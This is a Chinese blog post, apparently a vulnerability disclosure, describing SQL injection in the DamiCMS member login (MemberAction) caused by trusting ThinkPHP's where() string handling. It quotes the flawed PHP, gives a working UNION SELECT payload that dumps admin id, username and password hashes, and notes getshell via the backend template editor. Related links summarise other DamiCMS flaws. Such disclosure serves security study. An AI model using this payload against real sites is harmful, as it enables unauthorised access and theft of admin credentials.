php 大米cms,大米CMS注入后台可以getshelll

最新推荐文章于 2024-05-12 17:08:43 发布
最新推荐文章于 2024-05-12 17:08:43 发布
阅读量1.1k 收藏 1
点赞数
文章标签: php 大米cms

大米CMS注入,后台可以getshelll

详细说明:

一)注入

1.挖洞前奏

Damicms搭建在本地以后,对cms\dami\Core\Lib\Think\Db\Db.class.php进行修改,将sq语句var_dump处理。

然后就进行黑盒测试。搜索点,以及admin登入点输入单引号就会给过滤了。。。

看到有注册功能,发现登入点居然没有过滤单引号。。。

81db58ab9ca21e8c684deb89f96835f2.png

这运气比较好了

2.漏洞原理

于是苦逼看代码,发现thinkphp 看不懂 - -

去学习了一下回来了。。。。

发现登入点在: dami\Web\Lib\Action\MemberAction.class.php

这控制器里面

发现问题代码:

[php]

$username = htmlspecialchars($_REQUEST['username']);

$userpwd = $_REQUEST['userpwd'];

if($username=='' || $userpwd==''){$this->error('请输入用户名和密码?');exit();}

$info = M('member')->where("username='{$username}' and is_lock=0")->find();

if(!$info){$this->error('用户不存在或已经禁止登陆!');}

else

{

if($info['userpwd'] != md5($userpwd)){

$this->error('密码错误,请重新登录!');

}else{

$_SESSION['dami_uid'] = $info['id'];

$_SESSION['dami_username'] = $info['username'];

if(!empty($_REQUEST['lasturl'])){

$this->assign('jumpUrl',urldecode(htmlspecialchars($_REQUEST['lasturl'])));

}

else{

$this->assign('jumpUrl',U('Member/main'));

}

$this->success('登录成功~');

}

}

[/php]

发现username没有过滤就放进去了......我想为什么thinkphp不过滤呢?测试其它的点都够了了。最后发现了。

1ef5246584d15f9a43302265b312ae2f.png

Thinkphp的where查看如果只对字符型的,他是不会过滤的 = =......他过滤数组进去的和对象进去的对象。。。。。。。。。

程序员过分信赖thinkphp的过滤,导致漏洞发生......

也就是登入时候用户名:-1' union select 1,(select concat(id,0x23,username,0x23,password) from dami_admin),'c4ca4238a0b923820dcc509a6f75849b',4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#

密码是1

登入进去看见用户名就是注入出的东西了。

2c6e124a2dc8634395bf58f6b0208d4d.png

4.后台编辑文件直接生成php

模板管理 编辑文件 可以直接生成php文件

1efacb33a9a3286eb6bcdbe83842d723.png

feichenpan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
damiCMSv5.4漏洞复现
杨过的博客
06-12 1255
收集网站的指纹信息对于渗透测试来说是很重要的,CMS的信息漏洞,对于我们来说是很有大的发挥空间的。CMS的漏洞有很多,网上可以自己收集信息进行测试。
20-PHP代码审计——damicms5.3-5.4支付逻辑漏洞分析
网络安全
06-19 1951
本次分析damicms的两个漏洞,一个是5.3版本的任意文件操作漏洞,另一个是5.4版本的逻辑支付漏洞。
封神台尤里的复仇Ⅰ 小芳 第八章
最新发布
shierbai的博客
05-12 130
看到有验证码,我最先考虑的是用插件进行验证码识别然后进行爆破,但此处大米cms存在验证码复用的漏洞,所以大家信息收集要做好。bp抓包,右键send to intruder。没扫出来,先进robots.txt看看。随便输点什么,验证码一定要输对。这关最简单了,丢工具完事。审题,因此做后台扫描。
大米CMS-PHP
06-20
大米CMS是一个免费开源、快速、简单的PC建站和手机建站集成一体化系统,致力于为用户提供简单、快捷的PC建站和智能手机建站解决方案。 大米CMS特点: 1、扩展字段自定义,根据自己系统需要无限扩展字段,对于SELECT等下拉选项支持PHP代码生成OPTION,支持自定义多图多文件上传字段! 2、后台栏目分类无限极,并可以控制字段的显示或隐藏,生成不同的管理表单,内置RBAC权限体系,分栏目权限,内容权限,方便管理 3、列表模板(list目录下)和详细模板(page目录下)自定义, 4、基于thinkphp MVC框架开发, 内置大量函数方便前台模板调用,大米拥有自己的万能标签与分类标签等方便调用数据 5、作站灵活,可以将该系统做成任何类型网站,内置新闻类型站、企业站、手机3g站模型,通过http://***安装目录****/?t=xinwen这种查看,方便二次开发出不同模板 7、支持伪静态与全站生成静态HTML,支持数据采集 8、国内率先将微电商的概念引入CMS,让企业站不仅仅再是展示企业,可快速开展电子商务。集成支付宝标准双接口,支持购物车,可在线支付,货到付款,站内支付三种购买方式!会员集成QQ快捷登陆,支持购物订单通过电子邮件提醒! 9、跨平台支持移动终端访问,自适应,不变形!可做手机APP等应用开发,内置JSON数据API接口 10、国内CMS首创MSYQL表万能管理模型,输入MYSQL表名即可生成一个有增删改功能的管理模型,可快速在此基础上开发出自己想要的管理功能! 11、配备手机数据交互接口JSON格式API 12、支持中英等多语言 大米CMS 更新日志: 采用最新的thinkphp6.X框架重构,做了大量封装,代码无任何加密 完全开源,支持composer更新,模板写法有少许变化,尽量遵照原来写法 让熟悉大米cms的可以快速上手
【代码审计】大米CMS_V5.5.3 任意文件读取漏洞分析
12-03 880
  0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www.damicms.com/downes/dami.rar 测试网站首页:   0x01 代码分析 1、漏洞文件位置:/Admin/Lib/Action/TplAction.c...
【业务安全-02】业务数据安全测试及商品订购数量篡改实例
m0_64378913的博客
06-25 1138
业务中的数据安全不仅是存储在后台和数据库中的数据是否会被非法窃取或修改,还包括传输过程中的数据是否被非法窃取或修改。概述:电商类网站在业务流程整个环节,需要对业务数据的完整性(不允许篡改)和一致性(前后一致)进行保护,特别是确保在用户客户端与服务、业务系统接口之间的数据传输的一致性,通常在订购类交易数据流程中,容易出现服务端未对用户提交的业务数据进行强制检验,过度信赖客户端提交的业务数据而导致的商品金额篡改漏洞。手段:商品金额篡改测试,是通过抓包修改业务流程中的交易金额等字段,来检测是否存在金额篡改漏洞。目
大米cms靶场漏洞报告
喜欢创作各种技术类文章,希望可以帮到你
01-24 647
发现可以任意用户批量注册,一下注册了50个账号。可以登录,说明刚才批量注册成功。打开产品,购买一个,数量填-1。随便登录一个账号lyy105。1.点击注册,先注册用户。点击注册,抓包,批量注册。明显是一个支付逻辑漏洞。
大米CMS v5.9.6
12-01
4. **简单易用**:无论是对于非技术人员还是有编程基础的用户,大米CMS都提供了直观的后台管理界面和文档支持。"大米CMS使用说明.txt"文件应该是详细介绍了系统的使用方法,帮助用户快速上手。 5. **安全防护**:在...
大米CMS v6.0.0
10-12
大米CMS v6.0.0】是一款专为PC端和移动端建站设计的开源、高效、简洁的一体化建站系统。它以其强大的自定义功能和便捷的使用体验,深受用户喜爱。在这个版本中,大米CMS提供了诸多优化和新特性,旨在帮助用户更...
大米CMS v6.1.0
08-22
大米CMS v6.1.0是一款专为个人和企业打造的开源内容管理系统,它结合了PC端和移动端网站建设的功能,旨在提供一个高效且简洁的建站体验。这款CMS系统的特点在于其高度的可定制性和易用性,使得用户能够根据自己的...
大米网站CMS系统
08-07
大米CMS是一个免费开源的,快速、简单的面向智能手机等移动终端的网站CMS系统. 大米CMS提供从服务器端网站到手机客户端以及客户端管理一整套的解决方案。你不需要会安卓开发,不需要对响应式网站布局有极强的理解。保持和你以前的网站建设开发习惯。简单快捷的建立手机网站。极大的降低了手机网站建设的技术投入和开发成本。 大米CMS ASP发布后,受到需多中小企建站的用户好评。考虑到ASP的局限性。我们开发了PHP版本的大米CMS。功能更完善,操作更方便。
大米CMS v6.1.1
08-18
6. **优化与安全**:大米CMS针对性能进行了优化,加载速度快,同时具备一定的安全防护机制,如防止SQL注入、XSS攻击等,保护网站免受恶意攻击。 总的来说,大米CMS v6.1.1是一款综合性的CMS系统,以其开源、快速、...
Damicms漏洞挖掘
huohaowen的博客
01-18 841
本篇文章主要记录了对damicms的漏洞挖掘
DAMICMS&METINFO漏洞复现
Feng_Blue_的博客
10-26 2791
本文仅提供于学术探讨,如有后果自行承担。 DAMI—5.4任意商品购买漏洞 访问dami的网页 先注册用户 注册登录之后显示该页,直接选择上方的产品展示 选择框中内容 这里启动BP 对该商品进行下单操作 使用BP捕获到包 具体如下 将bp捕获到的包发送到repeater模块 找到填写数量的参数 对其进行修改 重放 提示交易成功,此时返回账户查看账户余额 订单页面也有信息 在体现页面看到账户余额位5400,这个上...
DamiCMS SQL注入分析
红队是青春
02-11 801
DamiCMS SQL注入漏洞分析
【代码审计】大米CMS_V5.5.3 任意文件删除及代码执行漏洞分析
12-03 1052
  0x00 环境准备 大米CMS官网:http://www.damicms.com 网站源码版本:大米CMS_V5.5.3试用版(更新时间:2017-04-15) 程序源码下载:http://www.damicms.com/downes/dami.rar 测试网站首页:   0x01 代码分析 1、漏洞文件位置1:/Admin/Lib/Action/TplAction....
大米cms后台多处存在存储型xss漏洞
炙热的酷盖
08-09 913
因为自己淋过雨,更懂太阳的力量 漏洞环境:damicms 首先进入后台 幻灯管理处————添加幻灯处 <script>alert('xss')</script> 单页标签处 基本管理-单页标签-添加标签 广告管理处 基本管理——广告管理 插件工具—文章内链处—添加内链 ...
【业务安全05】业务逻辑漏洞之篡改交易数据——基于大米CMS-V5.4电子商城
Fighting_hawk的博客
03-17 4214
1. 加深对业务逻辑漏洞的理解。 2. 掌握篡改交易数据这个业务逻辑漏洞的测试方法。
python大米图像分割
09-02
Python大米图像分割可以采用以下步骤: 1. 对图像进行二值化处理,将大米区域与背景区域分离。可以参考中的OTSU改进算法进行二值化处理。 2. 使用开运算操作,通过对二值化图像应用一个3x3的核,可以去除小的噪点并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值